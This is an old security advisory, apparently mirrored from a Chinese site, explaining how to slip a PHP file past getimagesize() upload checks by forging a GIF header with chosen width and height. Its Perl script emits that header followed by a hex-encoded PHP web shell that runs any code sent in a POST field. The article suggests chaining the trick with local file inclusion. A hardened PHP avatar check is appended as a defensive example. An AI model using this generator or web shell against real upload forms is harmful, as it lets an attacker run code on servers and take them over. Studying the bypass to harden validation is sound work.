Bypassing a defect in the getimagesize() function - vulnerability warning - the black bar safety net

2008-09-10T00:00:00
ID MYHACK58:62200820321
Type myhack58
Reporter Anonymous
Modified 2008-09-10T00:00:00

Description

By: superhei

A lot of PHP code uses getimagesize() to decide whether an uploaded file is an image. In black-box testing, many people prepend GIF89a to their PHP code to bypass checks like this one:

if (getimagesize($file)) {
    print "yes";
} else {
    print "no";
}

In many cases, though, there are other restrictions, such as a resolution limit of n x n, as in the following code:

if ($size = @getimagesize(IMAGES."avatars/".$avatarname)) {
    // Delete the avatar if it is wider or taller than 100 pixels
    if ($size['0'] > 100 || $size['1'] > 100) {
        unlink(IMAGES."avatars/".$avatarname);
        $set_avatar = "";
    }
}

First, look at the GIF file header:

00000000h: 47 49 46 38 39 61 AB 02 E5 03 B3 00 00 00 80 00 ; GIF89a???..?.
           G  I  F  8  9  a  $size['0'] $size['1']

$size['0'] x $size['1'] = [AB 02] 683 x [E5 03] 997

Perl code:

#!/usr/bin/perl
# The Script could pass getimagesize()
# gif size: 99x98 pixels

$gifhead="\x47\x49\x46\x38\x39\x61". #GIF89a
         "\x63\x00".                 #99
         "\x62\x00";                 #98

$phpcode="\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x63\x5d\x29\x3f\x3e"; #<?php @eval($_POST[c])?>

print $gifhead.$phpcode;

It should be said that the getimagesize() check is only one part of the picture; this is used together with other vulnerabilities. With local file inclusion, for example, code that strictly limits the type of the included file generally also uses getimagesize() to judge whether it is a picture. For example: http://www.4ngel.net/article/57.htm
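
A hardened form of the avatar check above, as an added example that is not part of the original article. The function names header_only_check and store_avatar are hypothetical, the GD extension is assumed to be loaded, and the sample file is constructed inline from a GIF header followed by inert filler bytes.

```php
<?php
// Added example, not from the original article. Function names are hypothetical.
// Requires the GD extension for imagecreatefromstring() and imagepng().

// The weak check: getimagesize() only parses the header fields it needs.
function header_only_check(string $path): bool
{
    return @getimagesize($path) !== false;
}

// Hardened form: type allowlist, size limit, full decode, re-encode,
// and a server-generated file name and extension.
function store_avatar(string $tmpPath, string $destDir, int $maxDim = 100): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }
    [$width, $height, $type] = $info;
    $allowed = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG];
    if (!in_array($type, $allowed, true) || $width > $maxDim || $height > $maxDim) {
        return null;
    }
    // A full decode fails when the header is not followed by real image data.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        return null;
    }
    // Re-encode from the decoded pixels. The stored name never comes from the
    // client, so the file cannot end up with an extension the server executes.
    $name = bin2hex(random_bytes(16)) . '.png';
    return imagepng($img, $destDir . '/' . $name) ? $name : null;
}

// Constructed sample: GIF89a signature, width 99, height 98, then inert filler.
$sample = "GIF89a" . pack('vv', 99, 98) . str_repeat('A', 32);
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, $sample);

var_dump(header_only_check($tmp));                 // weak check on the sample
var_dump(store_avatar($tmp, sys_get_temp_dir()));  // hardened check on the sample
unlink($tmp);
```

Re-encoding is one layer; storing uploads in a directory where the web server does not execute scripts covers the case where a file slips through.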